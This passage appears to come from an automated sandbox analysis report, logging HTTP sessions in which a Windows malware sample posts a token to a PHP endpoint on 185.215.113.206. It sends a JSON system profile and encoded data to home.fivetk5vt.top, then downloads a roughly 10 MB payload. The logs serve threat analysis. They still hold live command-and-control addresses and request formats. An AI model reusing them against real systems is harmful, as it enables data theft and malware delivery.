Dec 19, 2024 10:11:30.162508011 CET	1236	IN	Data Raw: 74 9f b5 b3 1c 90 92 05 2f 3d 09 77 a7 57 5f 8c 11 ef 1d 18 85 8a 5c fc 56 a1 96 b4 8d cc 8b 64 7f 80 59 b2 3b 81 df bf 16 bf 6a fe b5 89 6d a6 b9 f9 45 5c 02 1f 37 e4 04 fd fe c7 75 1b cf 48 8b dc c2 6c 16 ff 9e f8 da 80 92 65 ab 96 1b f1 0b 86 Data Ascii: t/=wW_\VdY;jmE\7uHle/fd-uhv7!t`&u]S+BZ#"\|W)X/nh0dE79\|+#:!SE$x?R#lq9?f6Z#tY?;e*v\|0$l2j
Dec 19, 2024 10:11:30.164252996 CET	1236	IN	Data Raw: 77 a9 68 cf b3 bf d4 54 33 04 27 47 cd 5a 3b b4 73 40 df 6a 7f 94 8b 5f 8a 1b 21 d8 5c ed 17 25 a7 d7 41 da 98 7a f8 6a 3d 91 4e 7f 2e 9b ba fd f4 58 4b 97 70 a8 f5 6a 16 76 88 f6 1d cf 38 bf 23 29 54 17 10 df 20 dc e6 c0 8f 24 ee a8 41 6e 8f 7a Data Ascii: whT3'GZ;s@j_!\%Azj=N.XKpjv8#)T $AnzINZRv`[a&0i.NlB=#Z6-SJ9#T1:\|H=qpeQ")SX9ZsUuj#&MXS##8$26Z:0\|N&
Dec 19, 2024 10:11:30.164289951 CET	1236	IN	Data Raw: b8 7a 98 38 f6 f0 4e 30 a0 9b 4e b5 f5 e7 18 95 8b a8 81 70 16 a9 c0 f6 64 89 ac 42 23 e5 6b 17 af 92 20 a8 eb 60 7c 24 49 9a 41 19 46 7a f9 d9 70 65 4f f1 3b 9b e2 92 f5 72 f2 d8 28 a9 db d4 fc 50 ab 08 3b f0 d9 30 b4 00 b3 5f 83 90 f1 05 46 1f Data Ascii: z8N0NpdB#k `\|$IAFzpeO;r(P;0_F-v%g'8S#$W^>9>#T;\|>q~$eu=E8SL&9#tWA}/LINBBazq-NQ"7(NM83BK8b~9#VT&
Dec 19, 2024 10:11:30.165643930 CET	1236	IN	Data Raw: 95 f9 29 46 7d 69 37 0e 04 01 57 92 77 ef 64 ab 01 7c 07 a2 3a 17 82 4c 7c 36 af 0c 5d 89 7e 37 28 17 a9 b4 15 fa fe ac 23 ac 27 80 fb cb 40 14 18 38 77 f6 b2 7c aa fc 21 c3 41 ae b3 33 ab 1a 43 04 34 58 a8 b8 0e b6 98 4b 76 a0 0b ab 97 03 39 ee Data Ascii: )F}i7Wwd\|:L\|6]~7(#'@8w\|!A3C4XKv9"Tg:j\|zLm Wne}?}wt+mAu#b!]<BZ6AD%t@GR"vur/M-BefM6Ct _{WSD9"9{U2Y:2\|@~.:ee
Dec 19, 2024 10:11:30.165685892 CET	1236	IN	Data Raw: 2b b3 7e c0 10 90 64 44 f7 17 5f 45 26 d8 4f d2 dc be 3b f8 77 3a 1c 57 57 39 b5 ed ed 9f ae fc d6 d3 7a b4 96 1a 91 b7 7f 80 68 7a 44 9b de 1b 8a 91 c0 80 fb 98 29 ee e9 3c 10 79 de 6e 01 f9 72 3e 96 cb 53 5a 50 37 a1 72 27 89 55 28 8a b4 70 b5 Data Ascii: +~dD_E&O;w:WW9zhzD)<ynr>SZP7r'U(p ]&d3-81Yc??au`06PlUg3ylGNc+]K2#Dp]'G=8WopL
Dec 19, 2024 10:11:30.280069113 CET	1236	IN	Data Raw: 28 34 ab fc 5f 11 5c c6 b3 84 ba b0 b3 04 27 2b 37 00 7c b4 4c 52 9e 9a 7f b5 61 9d 96 b4 23 d8 5b 1b 8f b2 72 3e 78 db 0b 12 30 14 d7 0f a0 d0 9b df d5 0c f7 89 82 7e 32 f9 49 96 15 aa 36 fa 03 31 eb 72 81 a7 42 cb 38 d8 73 6d 68 be 43 40 fc a4 Data Ascii: (4_\'+7\|LRa#[r>x0~2I61rB8smhC@zE+f?#YKz)2hWq#!O*'c)B~781:!~'KCw@\|^Cf#T0 &V$Azf5\|NZrAzNN< ,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50092	185.215.113.206	80	4132	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:29.820038080 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------ECGIIIDAKJDHJKFHIEBF--
Dec 19, 2024 10:11:31.650844097 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.6	50093	176.53.146.212	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:30.641257048 CET	12360	OUT	POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1 Host: home.fivetk5vt.top Accept: / Content-Type: application/json Content-Length: 517712 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 39 34 38 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "1734599488", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]
Dec 19, 2024 10:11:30.762228012 CET	2472	OUT	Data Raw: 5c 2f 4e 53 76 36 68 38 4b 50 46 7a 68 50 78 65 34 66 5c 2f 74 76 68 75 76 4f 6a 69 63 4e 4b 46 48 4f 4d 6b 78 6b 71 63 63 7a 79 66 46 54 69 35 51 68 69 4b 63 4a 53 6a 56 77 32 49 55 5a 79 77 57 4f 6f 33 77 2b 4b 6a 43 70 46 4f 6e 69 61 47 4a 77 Data Ascii: \/NSv6h8KPFzhPxe4f\/tvhuvOjicNKFHOMkxkqcczyfFTi5QhiKcJSjVw2IUZywWOo3w+KjCpFOniaGJw9D+PvGXwQ418DeJ3w\/xXh6dfCYyE8RkXEOBjVllGe4SnJRnUwtWpGMqOLwznCGPy6uo4nBznSm1VwuIwmKxNeirFQbH9vy\/+yr9RPyESiiigAqF\/9ZHXqn7OnwS0v9pv9qz9nv8AZ48S6vqWjeDPiPr\/AIuvf
Dec 19, 2024 10:11:30.762274027 CET	4944	OUT	Data Raw: 5c 2f 7a 39 50 70 54 59 74 38 6e 6b 5c 2f 77 41 43 66 39 4d 2b 50 38 35 5c 2f 7a 78 55 72 5a 6b 33 70 5c 2f 77 43 51 5c 2f 77 44 48 36 5c 2f 35 34 71 48 48 38 48 38 66 6c 65 56 4c 2b 36 5c 2f 35 64 5c 2f 77 44 50 54 30 78 58 51 61 45 50 6d 62 76 Data Ascii: \/z9PpTYt8nk\/wACf9M+P85\/zxUrZk3p\/wCQ\/wDH6\/54qHH8H8fleVL+6\/5d\/wDPT0xXQaEPmbv9sSRfvftH+f8AD2oWOfbvHz+Z+6lH\/Lf\/ADx2\/nT5NhCJ\/HHLz5f5en+fxp8mdru\/yP8A9M4v8fx96DoKbR87N8f1\/wA\/p17VCxeTYmfx8r\/D\/P1q5NH+82c7PK83\/HHT+tU\/9Wu90jfy\/wDWnzf6
Dec 19, 2024 10:11:30.762423992 CET	2472	OUT	Data Raw: 38 75 6e 6d 32 47 77 64 47 57 49 6c 68 33 57 6a 65 70 52 6c 4e 55 70 30 5c 2f 39 48 5c 2f 6f 5a 63 4f 59 33 43 35 54 6a 75 4e 75 45 73 5a 52 79 6a 69 32 76 50 38 41 31 61 7a 44 4d 61 74 50 36 36 70 38 4f 35 72 78 42 6c 46 47 72 66 42 34 78 59 6e Data Ascii: 8unm2GwdGWIlh3WjepRlNUp0\/9H\/oZcOY3C5TjuNuEsZRyji2vP8A1azDMatP66p8O5rxBlFGrfB4xYnLqNDBZhhsrxOJxMMJHF8icY4hUpVac4\/+ImH\/AKsp\/wDNj\/8A8Q1ftZ\/wTs\/bitf2\/fgbr3xlt\/hrcfCqbw78TNe+Gt94Zm8WR+NY5LrRvDnhDxMmq2muJ4c8KtJb3Vl4ws4WtptFt5Le6tLlRJcQmKZ\
Dec 19, 2024 10:11:30.762455940 CET	2472	OUT	Data Raw: 45 43 47 6d 37 46 39 50 35 5c 2f 34 30 36 69 6a 32 66 6e 2b 48 5c 2f 42 4e 4b 66 58 35 66 71 4d 32 44 33 5c 2f 7a 2b 46 56 32 58 64 5c 2f 4c 36 31 5a 33 5c 2f 76 45 58 5c 2f 50 72 5c 2f 41 50 58 5c 2f 41 50 31 56 44 52 37 50 7a 5c 2f 44 5c 2f 41 Data Ascii: ECGm7F9P5\/406ij2fn+H\/BNKfX5fqM2D3\/z+FV2Xd\/L61Z3\/vEX\/Pr\/APX\/AP1VDR7Pz\/D\/AIJoRbD7f5\/CmVYqJ+v4f1NHs\/P8P+CdBW8r2X8v\/rUhXbx27f561PRt3cYrQ29r5y\/r5leo5O341Ky44PINRSdvxoNYb\/L9UR0UUUGpXooooNKfX5Efl+\/6f\/XqF\/un8P5irVV6DQi2H2\/z+FIVK857\
Dec 19, 2024 10:11:30.762521982 CET	2472	OUT	Data Raw: 48 39 31 5c 2f 79 77 7a 5c 2f 6b 39 76 65 6a 35 5c 2f 4c 52 39 6b 65 79 34 7a 37 5c 2f 41 4d 76 38 5c 2f 6a 56 41 4d 33 65 62 4a 35 69 4a 49 6e 5c 2f 4c 58 5c 2f 56 65 66 30 78 5c 2f 50 72 5c 2f 6e 68 6e 2b 72 33 5c 2f 50 76 35 5c 2f 31 66 6d 2b Data Ascii: H91\/ywz\/k9vej5\/LR9key4z7\/AMv8\/jVAM3ebJ5iJIn\/LX\/Vef0x\/Pr\/nhn+r3\/Pv5\/1fm+fB\/kdj69KXb+8x\/D\/z79\/84\/Xt2pzfNvhdyn2f91j\/AD+dB0DP9dG+\/wC5H+9P9P8AP51WWXzGf5vLSP8A5aeb\/r\/89+eKmk8yP5P+ffE0Xl8z5\/z170yTfud\/48iLEc3+p59KAGfvPMm\/c\/J\/y
Dec 19, 2024 10:11:30.762587070 CET	2472	OUT	Data Raw: 4d 4b 2b 4d 38 62 2b 4c 63 4c 57 68 55 70 5c 2f 32 4e 44 4b 4d 6d 6a 54 71 71 55 5a 30 33 68 63 70 77 6c 62 45 77 6c 43 56 75 58 6c 78 32 4a 78 61 74 73 5c 2f 69 33 6b 78 6d 77 65 5c 2f 2b 66 77 70 6a 5c 2f 65 50 34 66 79 46 54 55 7a 75 5c 2f 30 Data Ascii: MK+M8b+LcLWhUp\/2NDKMmjTqqUZ03hcpwlbEwlCVuXlx2Jxats\/i3kxmwe\/+fwpj\/eP4fyFTUzu\/0H8q\/bD+fyKiin7D7f5\/CgD+y3wFLj4feCMf9Cj4c\/TSLP8Az7Z9q\/nN8YftmfEf9l3\/AIKUftP+JND1a4vrbxD\/AMIzoepaZqLC+t77RPh9H4G8ax+HbK2ujJFDe694Z8OeJPhzoU8KCbSZvHM17YmG7RJl
Dec 19, 2024 10:11:30.762604952 CET	2472	OUT	Data Raw: 57 4b 4b 5c 2f 32 44 50 38 47 43 76 52 55 6b 6e 62 38 66 36 56 46 5c 2f 47 6e 31 4e 42 70 54 36 5c 2f 49 2b 75 66 2b 43 62 69 37 66 2b 43 6c 50 37 49 66 4f 63 5c 2f 77 44 43 5c 2f 65 33 5c 2f 41 46 51 54 78 31 58 39 54 50 37 56 5c 2f 77 43 7a 44 Data Ascii: WKK\/2DP8GCvRUknb8f6VF\/Gn1NBpT6\/I+uf+Cbi7f+ClP7IfOc\/wDC\/e3\/AFQTx1X9TP7V\/wCzDbftS+EPB3hmX4jeKPhrd+CPHVr490nWvDWm+HdbL6ra+H\/EPh63e60jxTp2p6VJe6VH4in1rwzq4gXUPDHijT9I8RaVLFqOm20qfy0f8E3v+UlP7If\/AHX7\/wBUJ46r+pD9vLw\/4j8W\/sN\/tm+FPB+h634m
Dec 19, 2024 10:11:30.762636900 CET	2472	OUT	Data Raw: 42 37 58 2b 39 2b 48 5c 2f 41 49 4e 76 6c 74 76 5c 2f 77 43 32 55 55 66 2b 66 38 39 5c 2f 53 6f 76 4c 53 50 38 41 63 75 6e 5c 2f 41 4f 72 76 5c 2f 51 66 34 56 61 6b 6b 2b 2b 67 2b 66 75 50 4d 6c 5c 2f 63 63 66 35 37 5c 2f 41 4e 4b 67 62 5a 35 6e Data Ascii: B7X+9+H\/AINvltv\/wC2UUf+f89\/SovLSP8Acun\/AOrv\/Qf4Vakk++g+fuPMl\/ccf57\/ANKgbZ5nzpK\/7oeb\/wDX5OP6GtPZ+f4f8E6Bknk\/wJv8v\/Pt6fz9Khk2Nvf7nmSnEnT8v8nNTbU2p8sjvnrH\/nj\/AOtTOuz5Pk8391H6\/h+Hp+lYci8\/6+RpT6\/L9SnJ5y\/cmKeX\/wA9Yv8AXfT\/AD9M1C3yf
Dec 19, 2024 10:11:30.762705088 CET	2472	OUT	Data Raw: 38 50 2b 43 64 42 2b 37 74 46 59 6e 69 54 58 72 50 77 78 6f 65 70 61 5c 2f 71 42 78 5a 61 58 62 6d 35 75 44 75 43 34 6a 44 71 6e 33 69 43 42 79 34 35 77 61 37 62 34 70 36 52 6f 33 77 72 75 50 69 4a 61 53 5c 2f 46 66 34 4e 5c 2f 45 4f 39 2b 44 58 Data Ascii: 8P+CdB+7tFYniTXrPwxoepa\/qBxZaXbm5uDuC4jDqn3iCBy45wa7b4p6Ro3wruPiJaS\/Ff4N\/EO9+DXxb8OfBD406T8N9a+JL6x8J\/iF4v07xXqXhbTfFNt8S\/hN8MbLVNP1xPA3iu0tNd8C6l4x0SLUdGmsr2\/tXutOa9+Iz\/jjhPhbMMpyviDPMHlWPz2Uo5Vh8V7VPF8uMy\/LnJVIUp0qMP7QzXLMCqmIqUqcsXj
Dec 19, 2024 10:11:30.881974936 CET	2472	OUT	Data Raw: 37 6a 50 45 34 48 67 76 47 38 59 63 54 5a 52 69 73 70 34 6d 7a 4b 65 58 59 75 6e 55 7a 48 4c 2b 46 61 30 4a 34 6a 4e 73 79 5c 2f 32 57 6e 51 6f 56 73 6b 65 49 2b 70 31 65 4c 48 39 58 72 77 77 38 6f 35 64 58 7a 53 72 53 77 6c 43 68 68 76 32 5c 2f Data Ascii: 7jPE4HgvG8YcTZRisp4mzKeXYunUzHL+Fa0J4jNsy\/2WnQoVskeI+p1eLH9Xrww8o5dXzSrSwlChhv2\/L4fTQ4K4M4e4fy2rx7k3CORZrh8z4Xw1HNMF7Chj+I8NRnQyXLf9uqVMdHN6NTCZhDg1LFwlOvSzOlk9OePqYjFfsb8QP+CseleNv2d\/iJ4a8KeHvGXwq+OupS+FNS8KawL\/S\/HfhZL7SvE\/hCTVlj1XWbSPU
Dec 19, 2024 10:11:34.444422007 CET	164	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Thu, 19 Dec 2024 09:11:34 GMT content-type: text/html; charset=utf-8 content-length: 26 Data Raw: 63 70 34 7a 39 53 42 43 6f 6d 30 6d 6a 62 41 79 31 37 33 34 35 39 39 34 39 33 Data Ascii: cp4z9SBCom0mjbAy1734599493

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.6	50095	176.53.146.212	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:34.716437101 CET	123	OUT	GET /hLfzXsaqNtoEGyaUtOMJ1734514745?argument=cp4z9SBCom0mjbAy1734599493 HTTP/1.1 Host: home.fivetk5vt.top Accept: /
Dec 19, 2024 10:11:36.292319059 CET	1236	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Thu, 19 Dec 2024 09:11:36 GMT content-type: application/octet-stream content-length: 10816560 content-disposition: attachment; filename="3EoRfJgTGTVJkI;" last-modified: Wed, 18 Dec 2024 09:39:05 GMT cache-control: no-cache etag: "1734514745.3970041-10816560-1399330581" Data Raw: 1f d3 b8 f9 48 23 e6 ab e2 6f 4e 39 34 0e 37 71 e9 15 f5 d5 48 ac a9 8e 73 ae ae 8f 65 19 a3 59 2b 9b f9 5b 59 41 77 f8 92 f5 c2 cb 78 d2 d7 ba 88 44 aa 97 9b 59 23 e7 96 54 07 b2 3b 56 ad 75 9b 9f f3 b3 36 90 d6 d3 a9 67 51 92 ec b7 f0 f6 ba 0c c4 82 82 60 82 8a 0c aa 9c cb 03 03 c4 22 72 c1 2c 7a bd c2 21 aa 3c 2c 1c c6 94 94 9d 86 39 d7 db 82 46 f1 3a 04 14 24 07 20 ee f8 2a f7 58 eb f6 99 45 57 be 23 73 1b 76 33 bc 7b fd 30 8c bc 1c f0 ea a8 2e 8d 4d 1d 72 9e c6 2b 66 29 4c ad 5f 01 9b ff 3d b8 79 46 ea 95 db 24 8e aa ea eb 3f 5a 5d be fc 0f b9 f1 28 2b fc 0d f5 43 d0 f1 bd b0 29 47 21 99 56 ff d2 b8 72 2e 77 5c e3 c3 34 86 06 45 1b 3b ac 42 23 51 dc cc 26 97 7e 54 79 52 94 e6 86 aa 8f e8 2d 29 a8 c0 64 28 b3 7b e5 f5 2b 2c fa 54 c5 02 06 a3 e5 00 4a 3f 8d 60 b6 da 9c 71 2f d1 02 d4 88 d7 b6 3f 11 76 d8 2a a7 f1 c8 a4 44 86 6d 16 20 f9 8f 3e 13 09 5f ca 88 3c 27 83 f4 3b d6 df de 7b 33 4e f1 08 0f b2 cc a7 08 ff d9 f5 d3 e7 87 f0 cb e8 48 86 6d 17 05 0e 97 63 79 74 b4 92 ea 78 1f 34 f7 15 b7 2c [TRUNCATED] Data Ascii: H#oN947qHseY+[YAwxDY#T;Vu6gQ`"r,z!<,9F:$ XEW#sv3{0.Mr+f)L_=yF$?Z](+C)G!Vr.w\4E;B#Q&~TyR-)d({+,TJ?`q/?vDm >_<';{3NHmcytx4,QDOXKQ:S: z3NhJe9 m9RweCqLq4xA^0q=:%69cbmNT~D`}S=G$\|R)07opsQ[bJ~\/tMy_Pr?y9+(fw%H "<N88*DE}X@_B9uI3[>>$tQ2jm\$^!N\"fJ/a.(3=3AB7eS_tRCma6qo?Dz@(UZ^g{) ??oeOHE&Dy1%KS/TD=A]4tF16k50S,bbHs9P/1JhcA(,_ow0swHv=m/@"=Alst>E4,G2X{{Al8M
Dec 19, 2024 10:11:36.292488098 CET	224	IN	Data Raw: 5d ac f4 d9 8c d0 32 0f 96 13 e5 2d 8a b3 60 9a 31 5d 6f 19 a1 97 e5 ef 19 35 3e a2 80 74 8a 20 18 bd 80 5f de e5 db 19 40 4a 9f 22 59 e9 1d d7 b9 35 12 85 ba 1c 84 c2 cf 36 cc 45 05 80 35 ce 1a 47 a3 e8 17 e3 a0 96 e4 d0 39 46 58 c9 61 70 95 1d Data Ascii: ]2-`1]o5>t _@J"Y56E5G9FXap{;#gJ0rAt.^Zvmer*BP&BkGB{{(akOLe(%r{IA6mcXq'AuQd?7rD41)L
Dec 19, 2024 10:11:36.292503119 CET	1236	IN	Data Raw: 25 c4 1f 23 e4 5b 96 a9 3a 83 6a da 38 92 02 fe 8d 65 98 43 d5 1b 26 75 7b 43 2a 1e 1e 7a d1 e8 14 8d d0 d1 3d 22 b0 ca 64 a9 96 f6 23 0f 3f ea b8 9e 22 cd f2 bc d0 fe d6 66 ce c0 9f 9a 54 bd 57 bf aa 40 3d 22 da b8 3e f2 18 c3 1c d6 75 a5 04 bb Data Ascii: %#[:j8eC&u{C*z="d#?"fTW@=">u$DVFKhWZMf:)~eS3R+wf!)--u#&Sw6'Uu&wS\|Z~O]E:6qSWRcpwI^wZ"L
Dec 19, 2024 10:11:36.293035984 CET	1236	IN	Data Raw: 9f 10 69 5a d7 99 2b 57 3b e8 27 52 7c 01 0d 13 5d 88 3a 36 d1 bd 48 35 f6 76 27 8b 64 a9 e8 00 9b 0b 06 e9 b8 2a 5d fc 30 0d ea 8e 13 4a aa 49 9c dc 31 75 d3 97 62 00 b5 c7 95 1f 62 b7 c3 04 a8 94 7f 6c 94 bd e7 60 ae 7b f1 4d 98 02 f1 01 8c 2a Data Ascii: iZ+W;'R\|]:6H5v'd]0JI1ubbl`{MBl@=cy6I:m1Wq43upR6_Dn-j;oQ.x}FWUc R\|O5>/^o?r(?y~'&B
Dec 19, 2024 10:11:36.293055058 CET	1236	IN	Data Raw: 55 3b a7 82 a5 17 16 f1 de 27 4d 52 14 0b 48 bb b4 58 e9 d6 0b 20 87 a7 57 0d 7d f8 aa e4 b3 0b da 42 10 ac 54 13 f2 ca e7 57 15 43 19 79 70 ad 26 8c 04 13 55 4c 88 3a 17 ad 5c a0 6f ee 8e 7e 16 7e 08 02 1a f2 91 3b 62 0b bb f3 48 c1 d8 70 43 1d Data Ascii: U;'MRHX W}BTWCyp&UL:\o~~;bHpC;7^.qCaXgmi{D71,?:aPSuN82<mPj#[=<xeqXj<P^+.t(GZKt
Dec 19, 2024 10:11:36.293924093 CET	1236	IN	Data Raw: 12 01 88 a8 73 7e b8 12 55 89 1c 76 97 73 70 2e 58 aa dd 16 7f b0 85 a6 dd d2 16 d5 f1 19 1b 64 35 a5 ff f9 c2 77 b7 c8 27 9f 57 db 7e bf 0f 6d b2 c4 a3 17 98 af 94 e1 c9 29 4f 73 7d 7d 6e 8b c5 30 8b 74 41 df 15 d1 72 92 5b d0 04 ab ac df 92 a2 Data Ascii: s~Uvsp.Xd5w'W~m)Os}}n0tAr[X/] 2vr.Pg(F^]2AW`%h7$,fyQPL OD<Jp{O4qN(Y]\|<el:iey
Dec 19, 2024 10:11:36.293940067 CET	1236	IN	Data Raw: e0 b5 1a ef 2b a3 3e 42 93 a7 71 1f 3d 1a 3d cf 8b 87 0c 37 ac 17 9b b8 6f 78 ae 03 5b b1 e8 5d fb 99 e7 99 1d ab 2a 02 a1 0e c5 06 3d b7 5d 01 fd f2 36 63 da 72 e0 82 c5 fb 29 d2 ca 04 11 27 34 42 67 dc e4 ad 52 d5 4e ce 5d ee c9 87 b9 2d 57 03 Data Ascii: +>Bq==7ox[]=]6cr)'4BgRN]-W mE]k+p<&\|^"!=9eW[N1aM3ErL2}(f&f+TdX66BJ7e#Z3qag2+E{E,7m;DM"_;P[
Dec 19, 2024 10:11:36.295202017 CET	1120	IN	Data Raw: 21 2e 60 87 f3 60 f0 4f 9a e9 15 5d 16 19 bf 81 15 92 33 0d c1 6f 6d 2c 3b f4 1e 54 5e 7e 3e 1b 2d 36 3d c8 8a 86 f2 22 6b 06 ac 2d 1c 4d 4e 2e 4f f9 37 c8 6a 9c 79 cf 32 20 cb d3 99 80 0d 3c f9 5b bf ca 93 a9 b3 f1 1f f2 27 5a dc 7c 90 eb f5 81 Data Ascii: !.``O]3om,;T^~>-6="k-MN.O7jy2 <['Z\|f=V56c<0g]Tq*?Axhy]5G%S 'UCJ]PSAw{!q!y&#L#a?)V+bG{(ob2<KG0US1}N^~
Dec 19, 2024 10:11:36.295218945 CET	1236	IN	Data Raw: 3d a5 65 5f 76 56 21 51 eb 7a f3 e9 9f 7c 4c 67 65 a0 4d 69 49 6b 46 07 a0 2c c5 9e db 07 85 ca f1 4f d1 e2 cb b0 0b 0a 65 a8 ca 52 5d 20 b8 e8 e0 4b 5f 1a 13 78 7c 3a c2 e8 d5 29 c9 b7 5a 94 71 99 02 ca 8c 69 26 4b 76 f3 2d dc 69 3e bb 29 65 24 Data Ascii: =e_vV!Qz\|LgeMiIkF,OeR] K_x\|:)Zqi&Kv-i>)e$*`diGCCl%`ofh>M>!69'%TD%^$ b+[@Q2rJ]+>C;S[!d=^1<ux?- kPQk_g[
Dec 19, 2024 10:11:36.296276093 CET	1236	IN	Data Raw: 7b 91 74 35 c9 69 b5 4b f0 06 b3 ed 2c f5 ff d7 b4 7a be cc 14 72 62 92 bd c2 92 f8 f0 89 9d 73 a2 8b 8c 97 07 53 92 c7 a0 86 c5 49 13 44 28 9a 27 9b c6 81 f0 a4 bb 7a 8f fb 4e 51 1c b3 fa d0 c0 9d 39 3b 42 6c 80 e2 b6 85 33 2a 35 47 c4 8d 8e e2 Data Ascii: {t5iK,zrbsSID('zNQ9;Bl35G-Fhw:(Pf_rumvv4\v@NZ?w[QpX&Wq@GG8V\ hnl0QcQ$Ra!{]^S_5~U5\
Dec 19, 2024 10:11:36.412722111 CET	1236	IN	Data Raw: 3d 09 fb 79 2b 2f 63 6d 96 6b 99 68 fe 20 0d 0a d6 da b1 26 fe 7e a3 02 35 67 52 cd 5b d1 a6 e1 a3 b8 71 5b 93 27 35 b1 ea c6 11 5b 35 96 54 a1 f9 8f 17 e9 af e2 d6 60 06 cd 97 36 e8 e4 01 cc 8b 60 54 10 7d b4 68 27 30 85 c8 5a 8e e3 32 c6 6b e8 Data Ascii: =y+/cmkh &~5gR[q['5[5T`6`T}h'0Z2k{3_Iy_42, ~$O<M&A,R 3m%0fJESz?,8q^W}z^P$,I{G^[;dL=u}{FglN_P[]:FF9+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50096	185.215.113.206	80	7592	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:35.319295883 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 19, 2024 10:11:36.771704912 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
